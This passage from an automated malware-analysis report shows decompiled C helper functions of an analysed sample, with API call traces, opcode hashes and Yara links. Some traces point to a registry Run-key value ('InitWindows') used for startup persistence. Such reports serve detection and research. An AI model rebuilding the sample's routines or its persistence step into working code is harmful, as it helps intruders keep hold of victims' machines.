Opcode Fuzzy Hash: 370f0e7cddf05cc77d7b802b52d7d942dbbf3519159c4e0b9a854eaa535263bc
Instruction Fuzzy Hash: BBD0C9B490030CABDB00DBA4D849BDCB7B8AB44304F000024EA12A7380D778E8498A55

Uniqueness

Uniqueness Score: -1.00%

Function 00410FC3, Relevance: 3.1, APIs: 2, Instructions: 56
registryCOMMON

Download Yara Rule

C-Code - Quality: 86%

			E00410FC3(void* __edx, short** _a4, intOrPtr _a8) {
				int _v8;
				int _v12;
				void* __ecx;
				long _t13;
				void* _t14;
				long _t18;
				short** _t23;
				void** _t25;
				void** _t32;
				char* _t36;

				_push(_t25);
				_push(_t25);
				_t23 = _a4;
				_t32 = _t25;
				_v8 = 0;
				_v12 = 0;
				_t13 = RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, 0,  &_v8); // executed
				if(_t13 != 0) {
					L5:
					_t14 = 0;
				} else {
					_t36 = E00401085(_v8);
					_t18 = RegQueryValueExW( *_t32,  *_t23, 0,  &_v12, _t36,  &_v8); // executed
					if(_t18 != 0) {
						goto L5;
					} else {
						L00402F91(_a8, _t36, _v8);
						if(_t36 != 0) {
							E00401099(_t36);
						}
						_t14 = 1;
					}
				}
				return _t14;
			}

0x00410fc6
0x00410fc7
0x00410fc9
0x00410fd2
0x00410fde
0x00410fe3
0x00410fe6
0x00410fee
0x00411030
0x00411030
0x00410ff0
0x00410ff9
0x0041100a
0x00411012
0x00000000
0x00411014
0x0041101b
0x00411022
0x00411025
0x0041102a
0x0041102d
0x0041102d
0x00411012
0x00411036

APIs

RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,00000000,00413589,?,?,?,004115B2,?,?,80000001), ref: 00410FE6

Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092

RegQueryValueExW.KERNEL32(?,74B60770,00000000,74B60770,00000000,00000000,?,004115B2,?,?,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 0041100A

Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00411E18,00000000,00000000,00000000,00000000,h\HA,00000000), ref: 0040109F
Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$ProcessQueryValue$AllocateFree
String ID:
API String ID: 3459632794-0
Opcode ID: 656efe065d2f745a599e3d52e7fa211059c1901071dd4ff00649176de5bda4da
Instruction ID: 69d7c31b5758bafeb646f8c166b5ca3cd31efce48150fde2089693d00117b33d
Opcode Fuzzy Hash: 656efe065d2f745a599e3d52e7fa211059c1901071dd4ff00649176de5bda4da
Instruction Fuzzy Hash: B7019272910118BFDB15DBA1DD45EEF7B7CEF48354F10017AF601E2260E774AE409A68

Uniqueness

Uniqueness Score: -1.00%

Function 00403554, Relevance: 3.1, APIs: 2, Instructions: 54
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E00403554(short** __ecx, intOrPtr _a4) {
				short** _v8;
				char* _t12;
				void* _t15;
				int _t35;
				short** _t36;

				_push(__ecx);
				_v8 = __ecx;
				E004031C3(_a4);
				if( *__ecx != 0) {
					_t35 = WideCharToMultiByte(0, 0x200,  *__ecx, E00403261(__ecx), 0, 0, 0, 0);
					_t12 = E00405EB4(_t35);
					_t36 = _v8;
					_t22 = _t12;
					WideCharToMultiByte(0xfde9, 0,  *_t36, E00403261(_t36), _t12, _t35, 0, 0);
					_t15 = E004033BF( &_v8, _t22); // executed
					E00403125(_a4, _t15); // executed
					L00405EA5(_v8);
					L00405EA5(_t22);
				}
				return _a4;
			}

0x00403557
0x0040355f
0x00403562
0x0040356b
0x00403587
0x0040358b
0x00403595
0x00403598
0x004035ac
0x004035b6
0x004035bf
0x004035c7
0x004035ce
0x004035ce
0x004035d9

APIs

Part of subcall function 00403261: lstrlenW.KERNEL32(74B60770,00403646,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,74B60770,00000000), ref: 00403268

WideCharToMultiByte.KERNEL32(00000000,00000200,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00404E98,?), ref: 00403581

Part of subcall function 00405EB4: VirtualAlloc.KERNEL32(00000000,?,00003000,00000004,00403652,?,?,?,0041150A,004135B9,00000000,Software\Microsoft\Windows\CurrentVersion\Explorer\,00413589,00000000,74B60770,00000000), ref: 00405EBE

WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 004035AC

Part of subcall function 004033BF: lstrlenA.KERNEL32(?,74B60770,?,00405A4F,h\HA,00000000), ref: 004033C8
Part of subcall function 004033BF: lstrlenA.KERNEL32(?,?,00405A4F,h\HA,00000000), ref: 004033D5
Part of subcall function 004033BF: lstrcpyA.KERNEL32(00000000,?,?,00405A4F,h\HA,00000000), ref: 004033E8

Part of subcall function 00403125: lstrcatA.KERNEL32(00000000,74B60770,?,00000000,?,004035C4,00000000,00000000,?,00404E98,?,?,?,?,?,00000000), ref: 00403151

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWide$AllocFreelstrcatlstrcpy
String ID:
API String ID: 346377423-0
Opcode ID: 816fc34385504e34486ef74325ac569177fd91557c523d87054715fe0287a58e
Instruction ID: e60468dc33da24ac1d373a4d21855b179caf180e2398fc3a06ed2420d09b12e6
Opcode Fuzzy Hash: 816fc34385504e34486ef74325ac569177fd91557c523d87054715fe0287a58e
Instruction Fuzzy Hash: 70014471601210B7DB15AFA5CC86E9F7A5D9F49755F10007AB906BB2C1CA786F008798

Uniqueness

Uniqueness Score: -1.00%

Function 0041106C, Relevance: 3.0, APIs: 2, Instructions: 47
registryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041106C(void** __ecx, void* _a4, short** _a8, int _a12, int _a16) {
				long _t10;
				short** _t22;
				void** _t23;

				_t23 = __ecx;
				_t22 = _a8;
				if(_a16 == 0 || L0040F731(_a4, _t22) != 0) {
					L4:
					_t10 = RegOpenKeyExW(_a4,  *_t22, 0, _a12, _t23); // executed
					if(_t10 != 0) {
						goto L6;
					}
					return _t10 + 1;
				} else {
					_a16 = 0;
					if(RegCreateKeyExW(_a4,  *_t22, 0, 0, 0, _a12, 0, __ecx,  &_a16) != 0) {
						L6:
						return 0;
					}
					E00410FAE(_t23);
					goto L4;
				}
			}

0x00411073
0x00411076
0x0041107c
0x004110b1
0x004110bb
0x004110c3
0x00000000
0x00000000
0x00000000
0x0041108c
0x0041108f
0x004110a8
0x004110c8
0x00000000
0x004110c8
0x004110ac
0x00000000
0x004110ac

APIs

RegOpenKeyExW.KERNEL32(74B60770,00000000,00000000,00413589,?,?,?,00413589,?,0041158B,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\), ref: 004110BB

Part of subcall function 0040F731: RegOpenKeyExW.ADVAPI32(74B60770,00000000,00000000,00020019,00000000,74B60770,?,00411088,?,?,00413589,?,0041158B,80000001,?,000F003F), ref: 0040F747

RegCreateKeyExW.ADVAPI32(74B60770,00000000,00000000,00000000,00000000,00413589,00000000,?,?,?,?,00413589,?,0041158B,80000001,?), ref: 004110A0

Part of subcall function 00410FAE: RegCloseKey.KERNEL32(?,?,0041112D,?,?,004136B9), ref: 00410FB8

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Open$CloseCreate
String ID:
API String ID: 1752019758-0
Opcode ID: 493710888fd6b06008087cf37a446b5d0cd482525da294b3161cbeeb0c1e5a8f
Instruction ID: 647549b5581b6afbdfecbf6355b0432e600c928c37604508df28fb6808740c6e
Opcode Fuzzy Hash: 493710888fd6b06008087cf37a446b5d0cd482525da294b3161cbeeb0c1e5a8f
Instruction Fuzzy Hash: DB016D7160114DBFAB108F92DC80DFB3F6EEF48398710403AFA0582220E7758DE19AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00405EC5, Relevance: 3.0, APIs: 2, Instructions: 16
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EC5(void* __ecx, long __edx) {
				void* _t2;
				void* _t6;

				if(__ecx != 0) {
					if(__edx != 0) {
						_t2 = RtlReAllocateHeap(GetProcessHeap(), 0, __ecx, __edx); // executed
						return _t2;
					} else {
						E00405EEE(__ecx);
						return 0;
					}
				} else {
					_t6 = RtlAllocateHeap(GetProcessHeap(), 8, __edx); // executed
					return _t6;
				}
			}

0x00405ec7
0x00405ed2
0x00405ee7
0x00405eed
0x00405ed4
0x00405ed4
0x00405edb
0x00405edb
0x00405ec9
0x00405f09
0x00405f0f
0x00405f0f

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4338d659764eff0880c1ac43e83da914df4b594db5a105237bcd59bfbdb29db5
Instruction ID: 355fd882f8ca0f2631c4ed151db30d63f44ccd49c655a0ee0cc85c17a1c28133
Opcode Fuzzy Hash: 4338d659764eff0880c1ac43e83da914df4b594db5a105237bcd59bfbdb29db5
Instruction Fuzzy Hash: 7DD0C9B06245016AEE4817A2C90D77B241AD7E4306F24C039B64AE1180FA784A005AA9

Uniqueness

Uniqueness Score: -1.00%

Function 00411D0C, Relevance: 3.0, APIs: 2, Instructions: 14
sleepCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00411D0C(signed int _a4) {

				Sleep(1); // executed
				return GetTickCount() * (1 + _a4 * 0x359) % 0x2710;
			}

0x00411d11
0x00411d34

APIs

Sleep.KERNEL32(00000001), ref: 00411D11
GetTickCount.KERNEL32 ref: 00411D17

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CountSleepTick
String ID:
API String ID: 2804873075-0
Opcode ID: b4ca311bf0cb1c45a44abb39bfeb90d6ab341e64d914aacf874c56c19a1ff2f5
Instruction ID: bc16fd327cf67d43f179a3bc3a933e895663b38586298b374b7f5ce74d885f03
Opcode Fuzzy Hash: b4ca311bf0cb1c45a44abb39bfeb90d6ab341e64d914aacf874c56c19a1ff2f5
Instruction Fuzzy Hash: 24D022303481046FE30C9B09FC4E2A13E4EE7E0345F04C03BF50EC90E0CDB056A04448

Uniqueness

Uniqueness Score: -1.00%

Function 00401F76, Relevance: 3.0, APIs: 2, Instructions: 12
threadCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00401F76(void** __ecx) {
				int _t1;
				void** _t4;

				_t4 = __ecx;
				if( *__ecx != 0) {
					TerminateThread( *__ecx, 0); // executed
					_t1 = CloseHandle( *_t4);
				}
				 *_t4 =  *_t4 & 0x00000000;
				return _t1;
			}

0x00401f77
0x00401f7c
0x00401f82
0x00401f8a
0x00401f8a
0x00401f90
0x00401f94

APIs

TerminateThread.KERNEL32(00000024,00000000,00000000,0040C48B,?,?,?,?,?,00000000), ref: 00401F82
CloseHandle.KERNEL32(00000024,?,?,?,?,00000000), ref: 00401F8A

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: CloseHandleTerminateThread
String ID:
API String ID: 2476175854-0
Opcode ID: aadccaf71a443f2b3bdea11f2f4388a3ef5eea36c1cdc0419be02b4eff8fd588
Instruction ID: c7ec7f4f0bb8835b939ea2519627dcb7fca494b18b0990d4978166eb0f662af9
Opcode Fuzzy Hash: aadccaf71a443f2b3bdea11f2f4388a3ef5eea36c1cdc0419be02b4eff8fd588
Instruction Fuzzy Hash: FFD0C931414211DFE7351F54EC087907BE4AB44352F204469B1C4550B4D7B50890CB48

Uniqueness

Uniqueness Score: -1.00%

Function 00410283, Relevance: 3.0, APIs: 2, Instructions: 8
synchronizationCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00410283(void** __ecx) {
				int _t2;
				void** _t4;

				_t4 = __ecx;
				ReleaseMutex( *__ecx);
				_t2 = FindCloseChangeNotification( *_t4); // executed
				return _t2;
			}

0x00410284
0x00410288
0x00410290
0x00410297

APIs

ReleaseMutex.KERNEL32(?,?,0040FEFD,x5A,00405BEC,x5A,00000000,00000000,00000000,00000000,?,?,?,?,00000000,h\HA), ref: 00410288
FindCloseChangeNotification.KERNEL32(?), ref: 00410290

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: ChangeCloseFindMutexNotificationRelease
String ID:
API String ID: 4264517613-0
Opcode ID: e8ea245e333d34bfb270a1424a8c5bfa333d1f7079b1e1b36508f6edab6d53e3
Instruction ID: db4c74b9d13bc5dced64540ca7ba47584a69d0e5ed2af3a6983ff5975521201b
Opcode Fuzzy Hash: e8ea245e333d34bfb270a1424a8c5bfa333d1f7079b1e1b36508f6edab6d53e3
Instruction Fuzzy Hash: DAB0927A001020EFEB252F94FC0C8D4BFA5FF8839131584BAF18182038CBB20CA09B84

Uniqueness

Uniqueness Score: -1.00%

Function 00405EEE, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EEE(void* __ecx) {
				char _t2;

				_t2 = RtlFreeHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x00405ef8
0x00405efe

APIs

GetProcessHeap.KERNEL32(00000000,?,00403044,?,00405C22,00000000,?,004110EE,?,?,004136B9), ref: 00405EF1
RtlFreeHeap.NTDLL(00000000,?,?,004136B9), ref: 00405EF8

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeProcess
String ID:
API String ID: 3859560861-0
Opcode ID: 3d30368483855cb176dc1d7fc82ddea602118197b7e971394d3f9e6bed523871
Instruction ID: 83c753a965441c1ae2adaa02f530585fa7d1ded7e68711522ece6e6ceeecec04
Opcode Fuzzy Hash: 3d30368483855cb176dc1d7fc82ddea602118197b7e971394d3f9e6bed523871
Instruction Fuzzy Hash: 67A00271994101BBDD4457E19D0DB55392C9795712F00C554B206C6150D66454408635

Uniqueness

Uniqueness Score: -1.00%

Function 00405EFF, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405EFF(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 8, __ecx); // executed
				return _t2;
			}

0x00405f09
0x00405f0f

APIs

GetProcessHeap.KERNEL32(00000008,?,00402FA7,BZ@,?,?,004103FD,BZ@,00405D61,?,74B60770,00000000,?,00405A42,00000000), ref: 00405F02
RtlAllocateHeap.NTDLL(00000000,?,004103FD,BZ@,00405D61,?,74B60770,00000000,?,00405A42,00000000), ref: 00405F09

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 6e63da2cd5404a95ce3de0fc3d2ddc78c3798c6b7392df3f8f4f485ec6ea96fa
Instruction ID: 0f67cddd9260aca77cc4e682daa7515305fd7a4cbe710e6bd9b137e8dc649acc
Opcode Fuzzy Hash: 6e63da2cd5404a95ce3de0fc3d2ddc78c3798c6b7392df3f8f4f485ec6ea96fa
Instruction Fuzzy Hash: 63A00271550101BBDE4457E49D4DF55361CA7D5712F01C554B545C5050D96554848725

Uniqueness

Uniqueness Score: -1.00%

Function 00405F53, Relevance: 3.0, APIs: 2, Instructions: 6
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405F53(long __ecx) {
				void* _t2;

				_t2 = RtlAllocateHeap(GetProcessHeap(), 0, __ecx); // executed
				return _t2;
			}

0x00405f5d
0x00405f63

APIs

GetProcessHeap.KERNEL32(00000000,000000F4,00410477,?,74B60770,00000000,00405A34), ref: 00405F56
RtlAllocateHeap.NTDLL(00000000), ref: 00405F5D

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$AllocateProcess
String ID:
API String ID: 1357844191-0
Opcode ID: 8dac45b02a4e8810098615177e6676a5eb93ef3c43ed96d7165966a45ac74c37
Instruction ID: 2c39c16443e719b439de46f2723eb7a9b8fd362e317876e93441d03dd21b6187
Opcode Fuzzy Hash: 8dac45b02a4e8810098615177e6676a5eb93ef3c43ed96d7165966a45ac74c37
Instruction Fuzzy Hash: 2DA00271554101BBDE4457E09D4DF55361C9795713F018554F505C5050D56554808625

Uniqueness

Uniqueness Score: -1.00%

Function 0040309D, Relevance: 2.6, APIs: 2, Instructions: 53
COMMON

Download Yara Rule

C-Code - Quality: 91%

			E0040309D(char** __ecx, void* __eflags, intOrPtr* _a4) {
				char** _v8;
				short* _t15;
				void* _t19;
				int _t39;

				_push(__ecx);
				_v8 = __ecx;
				 *_a4 = 0;
				if(E0040308C(__ecx) > 0) {
					_t39 = MultiByteToWideChar(0, 2,  *__ecx, E0040308C(__ecx) + 2, 0, 0) + _t14;
					_t15 = E00405E22(_t39);
					_t26 = _t15;
					E0040308C(_v8);
					MultiByteToWideChar(0xfde9, 0,  *_v8, 0xffffffff, _t15, _t39);
					_t19 = E004035E5( &_v8, _t15); // executed
					E00403437(_a4, _t19); // executed
					L00405EA5(_v8);
					L00405EA5(_t26);
				}
				return _a4;
			}

0x004030a0
0x004030aa
0x004030ad
0x004030b6
0x004030d2
0x004030d6
0x004030de
0x004030e0
0x004030f5
0x004030ff
0x00403108
0x00403110
0x00403117
0x00403117
0x00403122

APIs

Part of subcall function 0040308C: lstrlenA.KERNEL32(00000000,004030B4,74B60770,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,74B60770,?,0040350E,00000000,?,00000000), ref: 00403093

MultiByteToWideChar.KERNEL32(00000000,00000002,00000000,-00000002,00000000,00000000,74B60770,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,74B60770), ref: 004030CA

Part of subcall function 00405E22: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004,?,?,004033E2,?,00405A4F,h\HA,00000000), ref: 00405E30

MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000000,00000000,?,004032DC,0040350E,00000000,-00000001,74B60770,?,0040350E,00000000), ref: 004030F5

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$ByteCharMultiVirtualWide$AllocDispatcherExceptionFreeUserlstrcpy
String ID:
API String ID: 2128046513-0
Opcode ID: 563fc5b71df9bd21d2d0311d6f605a9cc0fd5e93b4c1bbf32f436dcd5d41cb95
Instruction ID: 347e0e7f3c94eb91d88cbe649d0f3742026b32d0cfcfbff0d8a20a08a7cea218
Opcode Fuzzy Hash: 563fc5b71df9bd21d2d0311d6f605a9cc0fd5e93b4c1bbf32f436dcd5d41cb95
Instruction Fuzzy Hash: CE014C75601114BBDB15AFA5CC86DDE7AAD9F49355B00413AB901EB2D2CA789F008BA8

Uniqueness

Uniqueness Score: -1.00%

Function 00413936, Relevance: 1.6, APIs: 1, Instructions: 143COMMON

Download Yara Rule

APIs

SetEvent.KERNEL32(?,?,?,?,?), ref: 00413B28

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Event
String ID:
API String ID: 4201588131-0
Opcode ID: 662595b698528e97894cea1cc022cd70401093c5845e7429e429431902ff7c8b
Instruction ID: 63cf1b71c85769c5ddffad22f5230e7ad9fa4de0073afbecbfc03428393e078c
Opcode Fuzzy Hash: 662595b698528e97894cea1cc022cd70401093c5845e7429e429431902ff7c8b
Instruction Fuzzy Hash: 6151B778504106EFCB14DF15D948DEA7BB6F74530AF10461AE84A93364E334FACAEB28

Uniqueness

Uniqueness Score: -1.00%

Function 046F3550, Relevance: 1.6, APIs: 1, Instructions: 139COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 046F365B

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: 97cc4c9fc96fb950242f1dc0c38313b0528b7d762bb90593f1551098908baaba
Instruction ID: 97bf84093146bd6527412d212dbfaddaa7ef73dfa80c01a263cbb76e8d4a049c
Opcode Fuzzy Hash: 97cc4c9fc96fb950242f1dc0c38313b0528b7d762bb90593f1551098908baaba
Instruction Fuzzy Hash: 344164B1A02200DFE7269F24EC497963BA4EB90715F048325DE4597380FFB9BCC89B95

Uniqueness

Uniqueness Score: -1.00%

Function 0469D4E0, Relevance: 1.6, APIs: 1, Instructions: 100COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469D514

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: a3c7abf6de1cc2b6f8444ce611d50d7b01a5ff6300dc1c2332dba0014e64f2b7
Instruction ID: 0ca124bfa48bce7f45cb9b3b5ea5b95753fa18c0b23d902ceb1bd43ffc11436c
Opcode Fuzzy Hash: a3c7abf6de1cc2b6f8444ce611d50d7b01a5ff6300dc1c2332dba0014e64f2b7
Instruction Fuzzy Hash: 7B311CB56047019FD724DF29D880A67B3E8FB88314F104A2EE99983750E771FC15CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 046FA982, Relevance: 1.6, APIs: 1, Instructions: 52memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000008,047094A0,00000000,?,046F8532,00000008,047094A0,00000000,00000000,00000000,?,046F8157,00000001,00000214,?,046F84E8), ref: 046FA9C5

Part of subcall function 046F6CDC: __getptd_noexit.LIBCMT ref: 046F6CDC

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: AllocateHeap__getptd_noexit
String ID:
API String ID: 328603210-0
Opcode ID: 4d2cc12fa5eb533ef978ba0ecd92fd02efe05bd931f38cd3587940c7d91c049b
Instruction ID: 85ae3ad2fb65c410b7d0473ded0838b4253f36e1d41ee0878a6cc208dff190a8
Opcode Fuzzy Hash: 4d2cc12fa5eb533ef978ba0ecd92fd02efe05bd931f38cd3587940c7d91c049b
Instruction Fuzzy Hash: 5601B1312112159EEB258EE5DC14BA63758AF91364F068629EA9ECB690FB34F8408650

Uniqueness

Uniqueness Score: -1.00%

Function 0469DD80, Relevance: 1.5, APIs: 1, Instructions: 36COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 0469DD8E

Memory Dump Source

Source File: 00000004.00000003.336122914.0000000004690000.00000040.00000001.sdmp, Offset: 04690000, based on PE: true

Similarity

API ID: _memset
String ID:
API String ID: 2102423945-0
Opcode ID: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
Instruction ID: 551031d501a2d605f7a90352808da335b320db6f3ab444bbb2d4a88300162acb
Opcode Fuzzy Hash: d49f724bfc57ff056881ccfc2f64776627580c3b2d968b77fb2da9cf6968aa75
Instruction Fuzzy Hash: 1EF02B317002042BDA30961EDC0AC67B79DCFC2724F0402AAFD1C87390F9A2AC21C2F2

Uniqueness

Uniqueness Score: -1.00%

Function 0040F481, Relevance: 1.5, APIs: 1, Instructions: 30
COMMON

Download Yara Rule

C-Code - Quality: 89%

			E0040F481() {
				char _v8;
				void* __ecx;
				WCHAR* _t3;
				void* _t5;
				signed int* _t10;
				long _t15;
				signed int* _t16;
				intOrPtr* _t21;

				_push(_t10);
				_t16 = _t10;
				_t3 = E00401085(0x7d0);
				 *_t16 =  *_t16 & 0x00000000;
				_t19 = _t3;
				 *_t21 = 0x3e8;
				GetModuleFileNameW(0, _t3, _t15);
				_t5 = E004035E5( &_v8, _t19); // executed
				E00403437(_t16, _t5); // executed
				L00405EA5(_v8);
				E00401099(_t19);
				return _t16;
			}

0x0040f484
0x0040f48c
0x0040f48e
0x0040f493
0x0040f496
0x0040f498
0x0040f4a2
0x0040f4ac
0x0040f4b4
0x0040f4bc
0x0040f4c2
0x0040f4cd

APIs

Part of subcall function 00401085: GetProcessHeap.KERNEL32(00000000,?,00411E36,00400000,?,?,00000000,?,?,0041349D), ref: 0040108B
Part of subcall function 00401085: RtlAllocateHeap.NTDLL(00000000,?,?,00000000,?,?,0041349D), ref: 00401092

GetModuleFileNameW.KERNEL32(00000000,00000000,000007D0,?,00000000,00413589,?,00411618,80000001,?,000F003F,00000000,00000000,Software\Microsoft\Windows\CurrentVersion\Run\,00000000,InitWindows), ref: 0040F4A2

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Part of subcall function 00403437: lstrcpyW.KERNEL32 ref: 0040345C

Part of subcall function 00405EA5: VirtualFree.KERNELBASE(?,00000000,00008000,00405C2A,00000000,?,004110EE,?,?,004136B9), ref: 00405EAD

Part of subcall function 00401099: GetProcessHeap.KERNEL32(00000000,00000000,00411E18,00000000,00000000,00000000,00000000,h\HA,00000000), ref: 0040109F
Part of subcall function 00401099: HeapFree.KERNEL32(00000000), ref: 004010A6

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: Heap$FreeProcesslstrlen$AllocateDispatcherExceptionFileModuleNameUserVirtuallstrcpy
String ID:
API String ID: 3831115454-0
Opcode ID: c06f8cdb672322414aa60946f8d43c776e1b73815f21407eed711641c072f653
Instruction ID: ad1d1cd4c4ffaa7fef57f39b98bb0a0bcd1ac32502b314b3bb451a36869a539d
Opcode Fuzzy Hash: c06f8cdb672322414aa60946f8d43c776e1b73815f21407eed711641c072f653
Instruction Fuzzy Hash: F8E06D726042507BD614BB66DC1AFAF3BADCFC132AF00003EF545A61D1EFB85A40C6A8

Uniqueness

Uniqueness Score: -1.00%

Function 0040F76B, Relevance: 1.5, APIs: 1, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 58%

			E0040F76B(struct _EXCEPTION_RECORD* __ecx, void* __edx, void* __eflags) {
				char _v524;
				struct _EXCEPTION_RECORD* _t13;
				void* _t14;

				_t14 = __edx;
				_t13 = __ecx;
				E00401052( &_v524, 0, 0x208);
				__imp__SHGetSpecialFolderPathW(0,  &_v524, _t14, 0); // executed
				E004035E5(_t13,  &_v524); // executed
				return _t13;
			}

0x0040f784
0x0040f786
0x0040f788
0x0040f79c
0x0040f7ab
0x0040f7b5

APIs

SHGetSpecialFolderPathW.SHELL32(00000000,?,?,00000000,?,00000000,?), ref: 0040F79C

Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,00000000,?,00411E02,00000000,00000000,h\HA,00000000), ref: 004035EE
Part of subcall function 004035E5: lstrlenW.KERNEL32(00411E02,?,00411E02,00000000,00000000,h\HA,00000000), ref: 00403605
Part of subcall function 004035E5: KiUserExceptionDispatcher.NTDLL ref: 00403620

Memory Dump Source

Source File: 00000004.00000002.554668873.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Yara matches

Similarity

API ID: lstrlen$DispatcherExceptionFolderPathSpecialUser
String ID:
API String ID: 3679583613-0
Opcode ID: 6a469b24d73eabc363334ba3b78e70bf45d210dfd43ed31c53b968ede7a2c440
Instruction ID: d4192ae8197cefced1db0a03bf75d2c8b75bf692e971decfd73498c83af346c8
Opcode Fuzzy Hash: 6a469b24d73eabc363334ba3b78e70bf45d210dfd43ed31c53b968ede7a2c440
Instruction Fuzzy Hash: 71E0927560031826DB60A6169C0EFC73A6CCBC0715F0001B1BA58E21D1ED74DA4486A4

Uniqueness

Uniqueness Score: -1.00%

Function 00410F6E, Relevance: 1.5, APIs: 1, Instructions: 28
registryCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00410F6E(void** __ecx, short** _a8) {
				int _v8;
				signed int _t8;

				_push(__ecx);
				_v8 = 0;
